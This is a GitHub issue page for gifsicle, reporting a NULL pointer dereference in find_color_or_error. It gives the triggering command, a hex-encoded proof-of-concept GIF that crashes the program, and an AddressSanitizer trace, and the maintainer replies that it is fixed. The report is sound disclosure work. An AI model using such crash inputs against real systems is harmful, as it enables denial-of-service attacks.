Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NULL Pointer Deference vulnerability in find_color_or_error function #140

Closed
Ch111p opened this issue Jul 17, 2019 · 1 comment
Closed

Comments

@Ch111p
Copy link

Ch111p commented Jul 17, 2019

In support.c line 1110, The gfcm could be a NULL pointer in some cases.
Here is the usage:
gifsicle -t 1 test.gif -o test1.gif
POC here:
\x47\x49\x46\x38\x39\x61\x01\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b
Here is Asan's report:

ASAN:SIGSEGV
=================================================================
==105510== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004455e7 sp 0x7ffeda9eb800 bp 0x600e0000df80 T0)
AddressSanitizer can not provide additional info.
    #0 0x4455e6 (/home/lcy/gifsicle/gifsicle+0x4455e6)
    #1 0x44b496 (/home/lcy/gifsicle/gifsicle+0x44b496)
    #2 0x45af92 (/home/lcy/gifsicle/gifsicle+0x45af92)
    #3 0x45dedc (/home/lcy/gifsicle/gifsicle+0x45dedc)
    #4 0x40651e (/home/lcy/gifsicle/gifsicle+0x40651e)
    #5 0x7f86fba2ff44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44)
    #6 0x407cf4 (/home/lcy/gifsicle/gifsicle+0x407cf4)
==105510== ABORTING
@kohler
Copy link
Owner

kohler commented Jul 17, 2019

This appears to be fixed in #140, thanks for the report!

@kohler kohler closed this as completed Jul 17, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants